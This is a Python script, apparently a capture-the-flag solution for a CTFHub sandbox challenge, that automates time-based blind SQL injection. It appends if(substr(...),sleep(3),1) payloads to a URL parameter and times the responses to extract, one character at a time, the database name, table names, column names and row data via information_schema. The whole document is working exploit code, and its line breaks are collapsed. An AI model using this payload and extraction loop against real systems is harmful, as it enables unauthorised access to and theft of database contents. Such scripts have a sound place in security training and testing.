时间盲注脚本
import requests
import string
import timedef get_database(url):database = ''for i in range(1, 9):for j in string.ascii_letters:target = url + 'if(substr(database(),%d,1)="%s",sleep(3),1)' % (i, j)time1 = time.time()request = requests.get(target)time2 = time.time()if time2 - time1 > 2:database += jprint(database)breakprint('Database:', database)return databasedef get_table(url, database):tablesname = []for i in range(0, 2):name = ''for j in range(1, 6):for k in string.ascii_letters:target = url + 'if(substr((select table_name from information_schema.tables where table_schema="' +\database + '" limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)time1 = time.time()request = requests.get(target)time2 = time.time()if time2 - time1 > 2:name += kprint(name)breaktablesname.append(name)print('Tablesame:', tablesname)return input("Choose TableName:")def get_columns(url, tablename, database):columns = []for i in range(0, 3):name = ''for j in range(1, 6):for k in string.ascii_letters:target = url + 'if(substr((select column_name from information_schema.columns where table_name="'\+ tablename + '" and table_schema="' + database\+ '" limit %d,1),%d,1)="%s",sleep(3),1)' % (i, j, k)time1 = time.time()request = requests.get(target)time2 = time.time()if time2 - time1 > 2:name += kprint(name)breakcolumns.append(name)print('Columnsname:', columns)return input("Choose Columnname:")def getdata(url, tablename, database, columns):data = ''for i in range(0, 50):for j in string.digits\+ string.ascii_letters\+ string.punctuation:target = url + 'if(substr((select '\+columns\+ ' from ' + tablename\+ '),%d,1)="%s",sleep(3),1)' % (i, j)time1 = time.time()request = requests.get(target)time2 = time.time()if time2 - time1 > 2:data += jprint(data)breakprint(data)if __name__ == "__main__":url = "http://challenge-71506a2f58c546c4.sandbox.ctfhub.com:10080/?id="database = get_database(url)tablename = get_table(url, database)columns=get_columns(url, tablename, database)getdata(url, tablename, database,columns)